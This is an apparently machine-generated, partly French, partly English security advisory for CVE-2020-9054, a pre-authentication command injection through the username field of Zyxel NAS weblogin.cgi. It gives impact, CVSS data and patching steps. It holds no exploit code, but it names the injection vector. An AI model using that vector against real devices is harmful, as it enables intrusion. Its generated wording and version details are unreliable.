Aperçu
Zyxel NAS devices running firmware version 5.21 contain a critical pre-authentication command injection vulnerability in the weblogin.cgi script. The vulnerability exists due to improper sanitization of the username parameter, allowing unauthenticated remote attackers to execute arbitrary code with root privileges by sending specially crafted HTTP requests. La vulnérabilité a été divulguée le March 4, 2020. CISA a identifié CVE-2020-9054 comme étant exploitée mais n'est pas actuellement connue pour être utilisée dans des campagnes de rançongiciel.
Détails techniques
The vulnerability exists in the weblogin.cgi web interface of Zyxel NAS devices. The application fails to properly validate and sanitize the username parameter before passing it to shell commands. An attacker can inject arbitrary shell metacharacters and commands into the username field of HTTP login requests, causing the server to execute malicious commands with root privileges. No authentication is required to exploit this vulnerability, as the injection occurs during the login process itself.
La vulnérabilité est classifiée comme CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')) etCWE-20 (Improper Input Validation) .
La vulnérabilité a reçu un score de base CVSS v3.1 de 9.8 (CRITICAL) avec la chaîne vectorielle CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, indiquant sa nature critical.
Impact
Successful exploitation allows an unauthenticated remote attacker to execute arbitrary commands with root privileges on the Zyxel NAS device. This enables complete compromise of the device, including: unauthorized access to stored data, modification or deletion of files, installation of malware or backdoors, use of the device as a launching point for attacks on other systems, denial of service, and potential lateral movement within connected networks. Given the nature of NAS devices as data storage repositories, this vulnerability poses a severe risk to data confidentiality, integrity, and availability.
Mitigation et contournements
1. Visit the Zyxel support website and locate your specific NAS model 2. Download the latest available firmware version (5.21(AAZF.5) or newer) 3. Access the device's web interface using an out-of-band connection if possible 4. Navigate to System Settings > Firmware Upgrade 5. Upload and install the patched firmware 6. Allow the device to reboot and verify the upgrade was successful 7. Verify the firmware version in System Information Les versions suivantes incluent les correctifs nécessaires : Firmware version 5.21(AAZF.5) and later, Various patched versions depending on specific NAS model.
Comme contournements temporaires : restrict network access to the nas device's web management interface (port 80/443) using firewall rules. only allow access from trusted ip addresses or subnets.; disable the web management interface entirely if not required, and use alternative access methods (ssh, serial console, or out-of-band management).; isolate the nas device on a segregated network segment with restricted access from untrusted systems., et implement rate limiting and authentication bypass protections at the network perimeter to detect and block exploitation attempts..
Recommandation de CISA : Apply updates per vendor instructions.
Ressources additionnelles
Source : Ce rapport a été généré par IA
